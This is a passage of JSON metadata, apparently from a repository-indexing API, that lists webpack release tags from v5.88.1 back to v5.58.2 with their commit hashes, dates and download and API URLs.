ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":